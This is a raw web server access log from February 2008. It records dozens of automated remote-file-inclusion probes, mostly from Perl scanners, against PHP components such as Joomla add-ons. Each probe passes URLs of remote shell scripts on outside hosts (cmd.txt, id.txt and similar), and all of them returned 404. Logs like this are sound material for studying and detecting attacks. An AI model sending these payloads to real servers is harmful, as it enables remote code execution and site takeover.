72.9.252.162 - - [17/Feb/2008:07:48:34 -0800] "GET /logs/class/forumpollrenderer.php?bbPath[path]=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.13.86.23 - - [17/Feb/2008:07:48:40 -0800] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/rose_love284/sikat.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.13.86.23 - - [17/Feb/2008:07:48:41 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/rose_love284/sikat.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.252.162 - - [17/Feb/2008:07:49:17 -0800] "GET /logs/access_080122.log/class/forumpollrenderer.php?bbPath[path]=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.184.165.34 - - [17/Feb/2008:07:49:25 -0800] "GET /logs/access_080108.log/index.php?option=com_minibb&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.18.172.70 - - [17/Feb/2008:07:51:32 -0800] "GET /logs/access_080108.log//administrator/index2.php?option=com_admin&task=sysinfo&no_html=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.18.172.70 - - [17/Feb/2008:07:51:32 -0800] "GET //administrator/index2.php?option=com_admin&task=sysinfo&no_html=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.18.172.70 - - [17/Feb/2008:07:51:32 -0800] "GET /logs//administrator/index2.php?option=com_admin&task=sysinfo&no_html=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.116.41.19 - - [17/Feb/2008:07:51:37 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.184.165.34 - - [17/Feb/2008:07:53:04 -0800] "GET /index.php?option=com_jrecache&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.11.67.242 - - [17/Feb/2008:07:53:06 -0800] "GET /logs/access_080117.log/modules/xfsection/modify.php?dir_module=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [17/Feb/2008:07:53:06 -0800] "GET /modules/xfsection/modify.php?dir_module=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [17/Feb/2008:07:53:06 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.105.61.241 - - [17/Feb/2008:07:53:29 -0800] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://crime.fileave/klotok.txt?http://crime.fileave/klotok.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.105.61.241 - - [17/Feb/2008:07:53:29 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://crime.fileave/klotok.txt?http://crime.fileave/klotok.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.51.226 - - [17/Feb/2008:07:53:40 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://checkitoutrenoir.free.fr/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
64.38.51.226 - - [17/Feb/2008:07:53:40 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://checkitoutrenoir.free.fr/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
72.55.164.183 - - [17/Feb/2008:07:53:54 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.76.29 - - [17/Feb/2008:07:54:01 -0800] "GET /index.php?option=com_jrecache&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.11.181 - - [17/Feb/2008:07:54:19 -0800] "GET /index.php?option=com_jrecache&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.18.172.70 - - [17/Feb/2008:07:54:40 -0800] "GET /logs/access_080101.log//administrator/index2.php?option=com_admin&task=sysinfo&no_html=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.65.169.46 - - [17/Feb/2008:07:55:19 -0800] "GET /logs/access.log//components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.partyanimals.nl/uploads/kola.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.64.76.29 - - [17/Feb/2008:07:55:46 -0800] "GET /logs/access_080101.log/index.php?option=com_jrecache&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.33.210 - - [17/Feb/2008:07:55:46 -0800] "GET /logs/index.php?option=com_addict&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/safe.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
69.64.76.29 - - [17/Feb/2008:07:55:47 -0800] "GET /logs/index.php?option=com_jrecache&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.33.210 - - [17/Feb/2008:07:55:49 -0800] "GET /index.php?option=com_addict&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/safe.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
79.15.137.93 - - [17/Feb/2008:07:55:58 -0800] "GET /logs/access_080131.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.3dhelp.com/administrator/components/.r/di??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.184.165.34 - - [17/Feb/2008:07:55:59 -0800] "GET /logs/access_080101.log/index.php?option=com_jrecache&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.184.165.34 - - [17/Feb/2008:07:56:00 -0800] "GET /logs/index.php?option=com_jrecache&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.11.181 - - [17/Feb/2008:07:56:11 -0800] "GET /logs/access_080101.log/index.php?option=com_jrecache&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.11.181 - - [17/Feb/2008:07:56:11 -0800] "GET /logs/index.php?option=com_jrecache&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.58.242.138 - - [17/Feb/2008:07:56:47 -0800] "GET /logs/access_080201.log/index.php?pagina=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.28.112.52 - - [17/Feb/2008:07:56:56 -0800] "GET /logs/access.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.onlinebusan.com/user_img/gmaw010021/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.52 - - [17/Feb/2008:07:56:56 -0800] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.onlinebusan.com/user_img/gmaw010021/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.52 - - [17/Feb/2008:07:56:56 -0800] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.onlinebusan.com/user_img/gmaw010021/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.65.116.80 - - [17/Feb/2008:07:57:02 -0800] "GET //oneadmin/photogallery/include.php?path[docroot]=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
216.65.116.80 - - [17/Feb/2008:07:57:02 -0800] "GET /errors.php?error=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
200.206.143.90 - - [17/Feb/2008:07:57:07 -0800] "GET /logs/access_080122.log//modules/Neos_Chronos/header.php?base_folder=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [17/Feb/2008:07:57:08 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [17/Feb/2008:07:57:08 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [17/Feb/2008:07:59:02 -0800] "GET /logs/access_080103.log//modules/Neos_Chronos/header.php?base_folder=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.195.28.2 - - [17/Feb/2008:07:59:21 -0800] "GET /logs/access_071231.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:07:59:31 -0800] "GET /logs/access_071230.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:07:59:31 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:07:59:31 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.49.42 - - [17/Feb/2008:07:59:57 -0800] "GET /logs/access_080117.log/index.php?id=http://64.38.52.250/~sexypimp/b0t/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.49.42 - - [17/Feb/2008:07:59:58 -0800] "GET /index.php?id=http://64.38.52.250/~sexypimp/b0t/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.49.42 - - [17/Feb/2008:07:59:58 -0800] "GET /logs/index.php?id=http://64.38.52.250/~sexypimp/b0t/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.31.153.4 - - [17/Feb/2008:08:00:04 -0800] "GET /logs/access_080118.log/index.php?pag=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.164.183 - - [17/Feb/2008:08:01:22 -0800] "GET /convert/mvcw.php?vwar_root=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.28.112.52 - - [17/Feb/2008:08:02:17 -0800] "GET /logs/access_080126.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.onlinebusan.com/user_img/gmaw010021/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.52 - - [17/Feb/2008:08:02:17 -0800] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.onlinebusan.com/user_img/gmaw010021/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.52 - - [17/Feb/2008:08:02:17 -0800] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.onlinebusan.com/user_img/gmaw010021/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.149.238.27 - - [17/Feb/2008:08:02:47 -0800] "GET /logs/index.php?pagina1=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.149.238.27 - - [17/Feb/2008:08:02:48 -0800] "GET /index.php?pagina1=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.26.105 - - [17/Feb/2008:08:03:39 -0800] "GET /tmp/?N=D HTTP/1.0" 200 815 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.230.11.181 - - [17/Feb/2008:08:04:09 -0800] "GET /index.php?option=com_joomlapack&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.135.207.90 - - [17/Feb/2008:08:04:21 -0800] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.135.207.90 - - [17/Feb/2008:08:04:21 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.38.51.226 - - [17/Feb/2008:08:05:07 -0800] "GET //bz/squito/photolist.inc.php?photoroot=http://checkitoutrenoir.free.fr/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
64.38.51.226 - - [17/Feb/2008:08:05:07 -0800] "GET /logs//bz/squito/photolist.inc.php?photoroot=http://checkitoutrenoir.free.fr/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
87.230.11.181 - - [17/Feb/2008:08:05:13 -0800] "GET /index.php?option=com_juser&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.11.181 - - [17/Feb/2008:08:05:40 -0800] "GET /logs/access_080120.log/index.php?option=com_joomlapack&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.11.181 - - [17/Feb/2008:08:05:41 -0800] "GET /logs/index.php?option=com_joomlapack&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.65.169.46 - - [17/Feb/2008:08:06:00 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.partyanimals.nl/uploads/kola.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.19.157 - - [17/Feb/2008:08:06:06 -0800] "GET /minamijewelry/source_images/batch1/ HTTP/1.0" 200 5016 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.206.143.90 - - [17/Feb/2008:08:06:13 -0800] "GET /logs/access_080131.log//modules/Neos_Chronos/header.php?base_folder=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.52 - - [17/Feb/2008:08:06:48 -0800] "GET /logs/access_080106.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.onlinebusan.com/user_img/gmaw010021/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.31.153.4 - - [17/Feb/2008:08:06:51 -0800] "GET /logs/access_080201.log/index.php?pagina=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.87.87.17 - - [17/Feb/2008:08:07:09 -0800] "GET /plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.granadoconsultoria.com.br/cache/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
198.87.87.17 - - [17/Feb/2008:08:07:09 -0800] "GET /logs/plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.granadoconsultoria.com.br/cache/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
67.28.112.52 - - [17/Feb/2008:08:07:47 -0800] "GET /logs/access_080106.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.onlinebusan.com/user_img/gmaw010021/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.52 - - [17/Feb/2008:08:07:48 -0800] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.onlinebusan.com/user_img/gmaw010021/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.52 - - [17/Feb/2008:08:07:48 -0800] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.onlinebusan.com/user_img/gmaw010021/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.185.20.38 - - [17/Feb/2008:08:08:13 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
218.185.20.38 - - [17/Feb/2008:08:08:13 -0800] "GET /logs/classes/adodbt/sql.php?classes_dir=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
89.184.165.34 - - [17/Feb/2008:08:08:37 -0800] "GET /index.php?option=com_joomlapack&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.76.29 - - [17/Feb/2008:08:09:20 -0800] "GET /index.php?option=com_joomlapack&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.86.110.22 - - [17/Feb/2008:08:10:11 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.76.29 - - [17/Feb/2008:08:10:28 -0800] "GET /logs/access_080120.log/index.php?option=com_joomlapack&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.76.29 - - [17/Feb/2008:08:10:29 -0800] "GET /logs/index.php?option=com_joomlapack&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.184.165.34 - - [17/Feb/2008:08:10:32 -0800] "GET /logs/access_080120.log/index.php?option=com_joomlapack&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.184.165.34 - - [17/Feb/2008:08:10:32 -0800] "GET /logs/index.php?option=com_joomlapack&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.28.71 - - [17/Feb/2008:08:10:55 -0800] "GET /minamijewelry/source_images/batch1/?M=A HTTP/1.0" 200 5016 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.11.67.242 - - [17/Feb/2008:08:11:04 -0800] "GET /logs/access_071230.log/modules/vwar/admin/admin.php?vwar_root=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [17/Feb/2008:08:11:04 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [17/Feb/2008:08:11:05 -0800] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.55.164.183 - - [17/Feb/2008:08:11:40 -0800] "GET /logs/access_080108.log/convert/mvcw.php?vwar_root=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.164.183 - - [17/Feb/2008:08:11:40 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.58.242.138 - - [17/Feb/2008:08:11:46 -0800] "GET /logs/access_080118.log/index.php?pag=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.164.183 - - [17/Feb/2008:08:12:17 -0800] "GET /logs/access_071221.log/convert/mvcw.php?vwar_root=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.65.169.46 - - [17/Feb/2008:08:12:19 -0800] "GET /logs/access_080201.log///administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.partyanimals.nl/uploads/kola.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.65.169.46 - - [17/Feb/2008:08:12:23 -0800] "GET ///administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.partyanimals.nl/uploads/kola.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.65.169.46 - - [17/Feb/2008:08:12:27 -0800] "GET /logs///administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.partyanimals.nl/uploads/kola.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.86.110.22 - - [17/Feb/2008:08:12:58 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://69.39.228.59/~dvl/cmd/www.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
88.86.110.22 - - [17/Feb/2008:08:12:58 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://69.39.228.59/~dvl/cmd/www.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
200.206.143.90 - - [17/Feb/2008:08:13:52 -0800] "GET /logs/access_071216.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.157.122.154 - - [17/Feb/2008:08:13:54 -0800] "GET /logs/access_080118.log/index.php?pag=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.206.143.90 - - [17/Feb/2008:08:13:58 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [17/Feb/2008:08:13:59 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.18.172.70 - - [17/Feb/2008:08:14:15 -0800] "GET /logs/access_080106.log/index2.php?option=com_admin&task=listcomponents=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.65.169.46 - - [17/Feb/2008:08:14:16 -0800] "GET /logs/access_071230.log//components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.partyanimals.nl/uploads/kola.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.239.6.64 - - [17/Feb/2008:08:14:31 -0800] "GET /logs/access_071225.log/modules/4nAlbum/public/displayCategory.php?basepath=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.60.94.230 - - [17/Feb/2008:08:15:08 -0800] "GET /logs/access_080117.log/mosConfig_absolute_path=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.230 - - [17/Feb/2008:08:15:09 -0800] "GET /mosConfig_absolute_path=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.230 - - [17/Feb/2008:08:15:09 -0800] "GET /logs/mosConfig_absolute_path=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.11.181 - - [17/Feb/2008:08:15:31 -0800] "GET /logs/access_080130.log/index.php?option=com_juser&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.11.181 - - [17/Feb/2008:08:15:31 -0800] "GET /logs/index.php?option=com_juser&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.157.122.154 - - [17/Feb/2008:08:15:52 -0800] "GET /logs/access_080201.log/index.php?pagina=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.86.110.22 - - [17/Feb/2008:08:16:02 -0800] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.86.110.22 - - [17/Feb/2008:08:16:03 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.25.34 - - [17/Feb/2008:08:16:03 -0800] "GET /tmp/?S=A HTTP/1.0" 200 815 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
